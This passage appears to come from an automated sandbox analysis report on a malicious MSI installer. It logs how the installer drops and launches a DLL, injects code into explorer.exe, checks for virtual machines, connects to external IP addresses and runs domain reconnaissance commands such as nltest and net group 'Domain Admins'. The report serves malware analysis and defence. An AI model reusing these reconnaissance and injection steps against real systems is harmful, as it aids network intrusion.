            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cscapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\whoami.exeSection loaded: version.dll
            Source: C:\Windows\System32\whoami.exeSection loaded: authz.dll
            Source: C:\Windows\System32\whoami.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\whoami.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\whoami.exeSection loaded: netutils.dll
            Source: C:\Windows\Installer\MSI17D3.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: fes.msiStatic file information: File size 2200576 > 1048576
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI17D3.tmp, 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmp, MSI17D3.tmp, 00000003.00000000.1684254663.0000000000CF7000.00000002.00000001.01000000.00000003.sdmp, fes.msi, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI17D3.tmp, 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmp, MSI17D3.tmp, 00000003.00000000.1684254663.0000000000CF7000.00000002.00000001.01000000.00000003.sdmp, fes.msi, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6289E4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,9_2_0E6289E4
            Source: avutil.dll.1.drStatic PE information: real checksum: 0x38ca43 should be: 0x1b07ed
            Source: avutil.dll.1.drStatic PE information: section name: .xdata
            Source: avutil.dll.1.drStatic PE information: section name: .debug
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CD323C push ecx; ret 3_2_00CD324F
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CBDA73 push edi; iretd 3_2_00CBDA74
            Source: C:\Windows\System32\rundll32.exeCode function: 5_3_000001E51CC60105 push ecx; retf 5_3_000001E51CC6010E

            Persistence and Installation Behavior

            barindex
            Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSI17D3.tmpJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1658.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI15E9.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI16A8.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\avutil.dllJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI17D3.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1688.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1658.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI15E9.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI16A8.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI17D3.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1688.tmpJump to dropped file

            Boot Survival

            barindex
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net config workstation
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami /groups
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami /groups
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE171E4 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_000001E51AE171E4
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6276DC rdtsc 9_2_0E6276DC
            Source: C:\Windows\explorer.exeCode function: 9_2_0E624948 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle,9_2_0E624948
            Source: C:\Windows\System32\rundll32.exeCode function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,5_2_000001E51E964D00
            Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,9_2_03118424
            Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,9_2_03117274
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 501Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8856Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 888Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 863Jump to behavior
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1658.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI15E9.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI16A8.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\avutil.dllJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1688.tmpJump to dropped file
            Source: C:\Windows\System32\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_5-71587
            Source: C:\Windows\Installer\MSI17D3.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-32923
            Source: C:\Windows\Installer\MSI17D3.tmpAPI coverage: 6.3 %
            Source: C:\Windows\explorer.exe TID: 7592Thread sleep count: 231 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 7592Thread sleep time: -231000s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 7600Thread sleep count: 501 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 7600Thread sleep time: -50100s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 7592Thread sleep count: 8856 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 7592Thread sleep time: -8856000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
            Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
            Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domainJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CEB02D FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00CEB02D
            Source: C:\Windows\explorer.exeCode function: 9_2_0311A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,9_2_0311A8E0
            Source: C:\Windows\explorer.exeCode function: 9_2_03112B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,9_2_03112B28
            Source: C:\Windows\explorer.exeCode function: 9_2_031204C0 FindFirstFileW,9_2_031204C0
            Source: C:\Windows\explorer.exeCode function: 9_2_0E626604 lstrcpyA,lstrlenA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,StrStrIA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,9_2_0E626604
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6216F4 FindFirstFileW,FindNextFileW,LoadLibraryW,9_2_0E6216F4
            Source: C:\Windows\explorer.exeCode function: 9_2_0E62AC90 GetSystemInfo,9_2_0E62AC90
            Source: explorer.exe, 00000009.00000000.1929051492.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: explorer.exe, 00000009.00000002.4143464537.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
            Source: explorer.exe, 00000009.00000000.1925954013.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
            Source: explorer.exe, 00000009.00000000.1929051492.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: explorer.exe, 00000009.00000000.1922418491.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
            Source: explorer.exe, 00000009.00000000.1920734447.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
            Source: explorer.exe, 00000009.00000000.1922418491.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000009.00000003.3467991469.0000000009929000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
            Source: explorer.exe, 00000009.00000002.4143464537.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
            Source: explorer.exe, 00000009.00000000.1925954013.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
            Source: rundll32.exe, 00000005.00000002.4140824135.000001E517790000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E51778E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4147116004.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4147116004.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.000000000982D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: explorer.exe, 00000009.00000003.3467991469.0000000009929000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: explorer.exe, 00000009.00000002.4143464537.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
            Source: explorer.exe, 00000009.00000002.4147116004.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
            Source: explorer.exe, 00000009.00000000.1920734447.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: explorer.exe, 00000009.00000000.1920734447.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_5-71005
            Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6276DC rdtsc 9_2_0E6276DC
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51E94CCE0 LdrGetProcedureAddress,5_2_000001E51E94CCE0
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CBD0A5 IsDebuggerPresent,OutputDebugStringW,3_2_00CBD0A5
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE2371C EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,5_2_000001E51AE2371C
            Source: C:\Windows\explorer.exeCode function: 9_2_0E624948 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle,9_2_0E624948
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6289E4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,9_2_0E6289E4
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CE2DCC mov ecx, dword ptr fs:[00000030h]3_2_00CE2DCC
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CEAD78 mov eax, dword ptr fs:[00000030h]3_2_00CEAD78
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CB2310 GetProcessHeap,3_2_00CB2310
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI17D3.tmp "C:\Windows\Installer\MSI17D3.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\avutil.dll, DLLMainJump to behavior
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CD33A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00CD33A8
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CD353F SetUnhandledExceptionFilter,3_2_00CD353F
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CD2968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00CD2968
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CD6E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00CD6E1B
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE2F0D8 SetUnhandledExceptionFilter,5_2_000001E51AE2F0D8
            Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000001E51AE17608 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter,5_2_000001E51AE17608
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6B1DA0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_0E6B1DA0
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6C53A8 SetUnhandledExceptionFilter,9_2_0E6C53A8

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\explorer.exeNetwork Connect: 104.21.68.89 443Jump to behavior
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 103.57.249.207 6542Jump to behavior
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 94.232.43.224 6542Jump to behavior
            Source: C:\Windows\System32\rundll32.exeMemory allocated: C:\Windows\explorer.exe base: 3110000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\System32\rundll32.exeCode function: 5_3_00007DF4D5F10100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,5_3_00007DF4D5F10100
            Source: C:\Windows\System32\rundll32.exeThread created: C:\Windows\explorer.exe EIP: 3110000Jump to behavior
            Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 3110000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\System32\rundll32.exeMemory written: PID: 2580 base: 3110000 value: 4DJump to behavior
            Source: C:\Windows\System32\rundll32.exeThread register set: 7192 1Jump to behavior
            Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 3110000Jump to behavior
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CB52F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,3_2_00CB52F0
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /allJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trustsJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trustsJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domainJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net config workstation
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
